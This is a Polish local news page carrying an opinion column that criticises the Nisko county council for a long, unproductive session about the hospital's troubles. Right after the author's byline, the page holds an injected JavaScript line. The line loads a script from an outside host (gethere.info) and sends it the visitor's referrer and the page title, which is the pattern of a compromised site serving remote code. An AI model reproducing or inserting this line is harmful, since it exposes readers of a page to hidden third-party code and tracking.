W Nisku

Jak to rada czas marnuje

Jak to rada czas marnuje

Ostatnia Sesje Nadzwyczajna Rady Powiatu Niżańskiego trwała ponad 4 godziny. Czy w tym czasie podjęto ważne decyzje, czy uchwalono ważne uchwały? Niestety nie.

Już kolejny raz rada pochyla się nas sytuacją szpitala. Opozycja twierdzi, że jest źle i za chwile szpitala nie będzie, część koalicji nie ma bladego pojęcia o sytuacji i nie specjalnie chce je mieć. Zarząd ze starostą na czele zręcznie odbijają piłeczkę w dyskusji, że sytuacja była zła już za poprzedniego zarządu powiatu. Pada wiele mocnych słów, radni wyciągają coraz to nowe materiały, dyrektor się broni i tak przez długie godziny.

Nadal nie wiadomo, o co tak naprawdę chodzi, bo na pewno nie o dobro pacjentów. O kasę? Ale, o jaką bo płynność finansowa szpitala jest zachwiana od 2010 roku, zresztą inne szpitale w Polsce mają podobnie. Może o to, kto zawinił? Ale tu też nikt się przyznać nie chce. Może o to, który dyrektor, a w sumie czyj dyrektor jest lepszy? Bo przedtem był nasz, teraz wasz. I znów długa dyskusja, z której nic nie wynika.

Owszem jest źle w szpitalu, ale może zamiast skupiać się na słownej przepychance i machaniu dokumentami, rada w końcu by usiadła i wspólnie uradziła, co zrobić, żeby po pierwsze szpital postawić na nogi, po drugie zadbać o pacjentów, a po trzecie przypomniała sobie, że ma służyć mieszkańcom powiatu. Bo jak na razie te trzy zadania marnie jej wychodzą.

Małgorzata Petecka

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + '&default_keyword=’ + encodeURIComponent(document.title) + ”;

2 komentarze

Komentarze

Zostaw komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

W Nisku

Więcej w W Nisku

Podpisanie i wmurowanie aktu erekcyjnego pod budowę Sądu w Nisku

rni24.eu19 października 2021

S19 Lasy Janowskie – Zdziary oddana do ruchu

rni24.eu18 października 2021

Andżelika Guściora ze stypendium Starosty Niżańskiego

rni24.eu18 października 2021

Uroczysta gala dla nauczycieli i pracowników oświaty

rni24.eu18 października 2021

Szkoła Przysposabiająca do Pracy w Ulanowie zyskała nowe ogrodzenie

rni24.eu18 października 2021
nck

„Nie lękajcie się być świętymi” w NCK Nisko

rni24.eu13 października 2021

Umowa na budowę kanalizacji w Nowej Wsi już podpisana

rni24.eu12 października 2021

Do skradzionej betoniarki dotarli po śladach kół

rni24.eu8 października 2021

Spotkanie II z cyklu Wieki niezupełnie ciemne

rni24.eu8 października 2021